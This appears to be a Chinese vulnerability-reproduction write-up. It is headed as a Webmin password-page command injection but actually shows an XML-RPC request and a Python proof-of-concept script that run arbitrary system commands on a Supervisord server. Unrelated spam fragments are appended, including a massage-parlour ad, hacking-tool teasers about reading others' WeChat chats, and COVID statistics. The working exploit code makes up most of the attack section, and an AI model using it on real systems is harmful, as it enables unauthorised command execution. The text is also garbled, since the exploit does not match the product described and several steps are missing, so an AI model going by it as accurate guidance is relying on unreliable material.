Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。
启动环境后访问,忽略证书后即可看到登录页面。
需要注意,必须开启“用户更改密码”,这里环境已经开启了,如果没有开启需要手动开启:
首先进入容器,修改root密码:
修改后登录webmin后修改配置:
在中查看则说明修改成功。
接下来开始复现,发送如下数据包,即可执行id命令:
POST /password_change.cgi HTTP/1.1 Host: [ip]:10000 Accept-Encoding: gzip, deflate Accept: ** Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 213 <?xml version="1.0"?> <methodCall> <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName> <params> <param> <string>touch /tmp/success</string> </param> </params> </methodCall>
查看命令执行情况:
可以看到命令成功执行。
这里还有大佬的另一个思路,将执行的结果写入log文件,然后调用Supervisord自带的readLog *** 读取log文件,将结果读出来。
poc脚本:
#!/usr/bin/env python3 import xmlrpc.client import sys target=sys.argv[1] command=sys.argv[2] with xmlrpc.client.ServerProxy(target) as proxy: old=getattr(proxy, 'supervisor.readLog')(0,0) logfile=getattr(proxy, 'supervisor.supervisord.options.logfile.strip')() getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile)) result=getattr(proxy, 'supervisor.readLog')(0,0) print(result[len(old):])
执行poc脚本,输入命令::
可以看到成功执行命令,并且看到了回显。
保健按摩会所,男士解压养生首选! 陌歌祭,想念不泣,别是忧虑,恰是忧虑,一缕心伤,半生寻觅,天边不相见,天边忘不尽,何其思量。小酌亦伤情,却是哀伤,最是一丝情意浓,却成离别不相逢,莫道销魂想念...
到了秋季是痘痘的高发期,会影响人们的容貌,增加了心理上的压力,同时也有可能会留下暂时性或者永久性的疤痕。尤其是下巴容易长痘,要找出其原因并且对症调理。 下巴长痘的原因有哪些? 1、没有彻...
打游戏一天赚500(玩啥游戏确实能赚钱)提到玩网络游戏一般人的反映全是砸钱,但针对另一群游戏玩家而言,网络游戏也可以变成挣钱的专用工具。时迄今日,手机游戏的类型越来越各种各样,而游戏里挣钱的方式也...
查别人手机里的微信聊天记录有什么办法 微信密码忘了,怎么找回来 昨日,据英国《每日邮报》报道,亚马逊智能音箱Alexa播放了《鼓励人们自杀》的内容。 报道称,当护士Dany Moretti试图向A...
哪里找黑客破解软件相关问题 黑客的技术都是从哪里学的相关问题 一般黑客抓肉鸡有什么用 黑客软件ATE交易所破解(找回qq密码黑客软件)...
中新社北京2月10日电 中国国家卫健委10日通报,9日全国报告新增确诊病例3062例(湖北2618例),当日新增治愈出院病例632例(湖北356例)。截至9日24时,全国报告现有确诊病例35982例,...